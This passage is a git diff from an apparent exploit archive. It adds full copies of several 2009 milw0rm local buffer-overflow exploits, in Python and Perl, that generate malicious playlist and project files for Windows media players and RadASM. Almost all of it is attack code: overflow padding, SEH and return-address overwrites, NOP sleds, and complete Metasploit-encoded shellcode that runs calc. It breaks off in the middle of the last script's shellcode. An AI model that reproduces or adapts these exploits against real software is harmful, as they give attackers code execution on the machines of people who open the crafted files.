-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x30\x42\x30\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x47" -"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58" -"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x58" -"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" -"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48" -"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x47" -"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x57\x4e\x51\x4d\x4a" -"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x45\x41\x53" 
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" -"\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x56\x4a\x59" -"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36" -"\x4e\x36\x43\x36\x42\x50\x5a" - ) - -exploit = buff + next_seh + seh + nop + shellcode - -try: - out_file = open("exploit.m3u",'w') - out_file.write(exploit) - out_file.close() - print "Exploit File Created!" -except: - print "Error" - -# milw0rm.com [2009-03-05] +#usage: exploit.py +print "**************************************************************************" +print " Media Commands (m3u File) Universal Seh Overwrite Exploit\n" +print " Founder: Hakxer" +print " Exploited by : His0k4" +print " Another Exploiter : Stack" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print "**************************************************************************" + + + + +buff = "\x41" * 4103 + +next_seh = "\xEB\x06\x90\x90" + +seh = "\x9F\x20\x01\x10" #Universal pop pop ret :p + + +nop = "\x90" * 19 + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x30\x42\x30\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x47" +"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58" +"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" +"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x58" +"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" 
+"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48" +"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" +"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x47" +"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x57\x4e\x51\x4d\x4a" +"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x45\x41\x53" +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" +"\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x56\x4a\x59" +"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36" +"\x4e\x36\x43\x36\x42\x50\x5a" + ) + +exploit = buff + next_seh + seh + nop + shellcode + +try: + out_file = open("exploit.m3u",'w') + out_file.write(exploit) + out_file.close() + print "Exploit File Created!" +except: + print "Error" + +# milw0rm.com [2009-03-05] diff --git a/platforms/windows/local/8171.py b/platforms/windows/local/8171.py index 5d5bd6ee4..268dd5c1b 100755 --- a/platforms/windows/local/8171.py +++ b/platforms/windows/local/8171.py 
@@ -1,60 +1,60 @@ -#usage: exploit.py -print "**************************************************************************" -print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploit\n" -print " Founder : 0in" -print " Exploited by : His0k4" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print "**************************************************************************" - - - -buff = "\x41" * 1880 - -next_seh = "\xEB\x06\x41\x41" - -nops = "\x90"*19 - -seh = "\x0E\xD2\x8E\x01" #yes universal :D - - - - -# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67" - "\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32" - "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b" - "\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c" - "\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74" - "\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37" - "\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f" - "\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b" - "\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38" - "\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44" - "\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47" - "\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f" - "\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39" - "\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37" - "\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b" - "\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31" - "\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b" - 
"\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71" - "\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72" - "\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67" - ) - - -exploit = buff + next_seh + seh + nops + shellcode - -try: - out_file = open("nokia.npl",'w') - out_file.write(exploit) - out_file.close() - print "Exploit file created!\n" -except: - print "Error" - -# milw0rm.com [2009-03-09] +#usage: exploit.py +print "**************************************************************************" +print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploit\n" +print " Founder : 0in" +print " Exploited by : His0k4" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print "**************************************************************************" + + + +buff = "\x41" * 1880 + +next_seh = "\xEB\x06\x41\x41" + +nops = "\x90"*19 + +seh = "\x0E\xD2\x8E\x01" #yes universal :D + + + + +# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com +shellcode = ( + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67" + "\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32" + "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b" + "\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c" + "\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74" + "\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37" + "\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f" + "\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b" + "\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38" + "\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44" + "\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47" + "\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f" + 
"\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39" + "\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37" + "\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b" + "\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31" + "\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b" + "\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71" + "\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72" + "\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67" + ) + + +exploit = buff + next_seh + seh + nops + shellcode + +try: + out_file = open("nokia.npl",'w') + out_file.write(exploit) + out_file.close() + print "Exploit file created!\n" +except: + print "Error" + +# milw0rm.com [2009-03-09] diff --git a/platforms/windows/local/8174.py b/platforms/windows/local/8174.py index 541663b62..154e9f380 100755 --- a/platforms/windows/local/8174.py +++ b/platforms/windows/local/8174.py 
@@ -1,53 +1,53 @@ -#!/usr/bin/python -print "**************************************************************************" -print "[*] Realtek Sound Manager 1.15.0.0 (PlayList) Seh Overwrite Exploit\n" -print "[*] Author: shinnai" -print "[*] Seh Exploitation : His0k4" -print "[*] Tested on: Windows XP SP2 (Fr)\n" -print "[*] Greetings to: All friends & Muslims HacKerS (DZ)" -print "**************************************************************************" - -buff = "\x41" * 200 - -next_seh = "\xEB\x06\x90\x90" - -seh = "\xBE\x2E\xC6\x72" #pop pop ret msacm32.drv - -buff2 = "\x44"*1989 - -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" - "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47" - "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38" - "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" - "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58" - "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44" - "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38" - "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" - "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" - "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a" - "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" - "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33" - "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" - "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59" - 
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56" - "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" - ) - -exploit = buff + next_seh + seh + shellcode + buff2 - -try: - out_file = open("exploit.pla",'w') - out_file.write(exploit) - out_file.close() - print "Exploit File Created!\nNow import it from Realtek" -except: - print "Error" - -# milw0rm.com [2009-03-09] +#!/usr/bin/python +print "**************************************************************************" +print "[*] Realtek Sound Manager 1.15.0.0 (PlayList) Seh Overwrite Exploit\n" +print "[*] Author: shinnai" +print "[*] Seh Exploitation : His0k4" +print "[*] Tested on: Windows XP SP2 (Fr)\n" +print "[*] Greetings to: All friends & Muslims HacKerS (DZ)" +print "**************************************************************************" + +buff = "\x41" * 200 + +next_seh = "\xEB\x06\x90\x90" + +seh = "\xBE\x2E\xC6\x72" #pop pop ret msacm32.drv + +buff2 = "\x44"*1989 + +shellcode = ( + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" + "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47" + "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38" + "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" + "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" + "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58" + "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44" + "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38" + "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" + 
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" + "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a" + "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" + "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33" + "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" + "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59" + "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56" + "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" + ) + +exploit = buff + next_seh + seh + shellcode + buff2 + +try: + out_file = open("exploit.pla",'w') + out_file.write(exploit) + out_file.close() + print "Exploit File Created!\nNow import it from Realtek" +except: + print "Error" + +# milw0rm.com [2009-03-09] diff --git a/platforms/windows/local/8177.py b/platforms/windows/local/8177.py index 2b903570e..da56cffdb 100755 --- a/platforms/windows/local/8177.py +++ b/platforms/windows/local/8177.py 
@@ -1,45 +1,45 @@ -#!/usr/bin/python -# RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit -# Exploited By : zAx -# Discovered and Idea By : Encrypt3d.M!nd -# Tested On : Windows XP ServicePack 2 English. -# Thanks to : All My Friends. -print " RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit" -print " Written By : zAx" -print " Contact : ThE-zAx@Hotmail.Com" -header = "[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1=" -zAx = "c4ca4238a0b923820dcc509a6f75849bc81e728d9d4c2f636f067f89cc14862ceccbc87e4b5ce2fe28308fd9f2a7baf3a87ff679a2f3e71d9181a67b7542122ce4da3b7fbbce2345d7772b0674a318d51679091c5a880faf6fb5e6087eb1b2dc8f14e45fceea167a5a36dedd4bea2543c9" -eip = "\x5D\x38\x82\x7C" # KERNEL32.DLL ESP In Windows SP2 EN -nopsled = "\x90"*20 -#win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x57" -"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38" -"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x48" -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x50\x45\x57\x45\x4e\x4b\x58" -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44" -"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" -"\x41\x30\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53" -"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37" -"\x4e\x50\x4b\x58\x42\x44\x4e\x30\x4b\x48\x42\x57\x4e\x51\x4d\x4a" 
-"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b" -"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x43" -"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47" -"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x59" -"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36" -"\x4e\x46\x43\x46\x50\x42\x45\x46\x4a\x47\x45\x36\x42\x30\x5a" -) -stack = header + zAx + eip + nopsled + shellcode + nopsled -file=open("zAx.rap","w") -file.write(stack) -file.close() -raw_input("\nExploit file created!, Now Go to RadASM and Open Our Devil Project :D\n") - -# milw0rm.com [2009-03-09] +#!/usr/bin/python +# RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit +# Exploited By : zAx +# Discovered and Idea By : Encrypt3d.M!nd +# Tested On : Windows XP ServicePack 2 English. +# Thanks to : All My Friends. +print " RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit" +print " Written By : zAx" +print " Contact : ThE-zAx@Hotmail.Com" +header = "[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1=" +zAx = "c4ca4238a0b923820dcc509a6f75849bc81e728d9d4c2f636f067f89cc14862ceccbc87e4b5ce2fe28308fd9f2a7baf3a87ff679a2f3e71d9181a67b7542122ce4da3b7fbbce2345d7772b0674a318d51679091c5a880faf6fb5e6087eb1b2dc8f14e45fceea167a5a36dedd4bea2543c9" +eip = "\x5D\x38\x82\x7C" # KERNEL32.DLL ESP In Windows SP2 EN +nopsled = "\x90"*20 +#win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x57" +"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38" 
+"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x48" +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x50\x45\x57\x45\x4e\x4b\x58" +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44" +"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" +"\x41\x30\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53" +"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37" +"\x4e\x50\x4b\x58\x42\x44\x4e\x30\x4b\x48\x42\x57\x4e\x51\x4d\x4a" +"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b" +"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x43" +"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47" +"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x59" +"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36" +"\x4e\x46\x43\x46\x50\x42\x45\x46\x4a\x47\x45\x36\x42\x30\x5a" +) +stack = header + zAx + eip + nopsled + shellcode + nopsled +file=open("zAx.rap","w") +file.write(stack) +file.close() +raw_input("\nExploit file created!, Now Go to RadASM and Open Our Devil Project :D\n") + +# milw0rm.com [2009-03-09] diff --git a/platforms/windows/local/8178.pl b/platforms/windows/local/8178.pl index e60a77fcf..eff063b87 100755 --- a/platforms/windows/local/8178.pl +++ b/platforms/windows/local/8178.pl 
@@ -1,205 +1,205 @@ -#!/usr/bin/perl -# MediaCoder 0.6.2.4275 Universal Stack Based Overflow -# By Stack -# Mountassif Moad -# cat Greatz.txt -# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z -# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d -# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support -my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46". - "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F". - "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20". - "\x0D\x0A\x44\x3A\x5C"; - -my $junk = "\x41" x 254; -my $ret = "\x93\x43\x92\x7c"; # Universal return adress :d -my $nop = "\x90" x 25; -# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com -my $calc_shell = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". - "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47". - "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48". - "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48". - "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c". - "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38". - "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54". - "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58". - "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43". - "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57". 
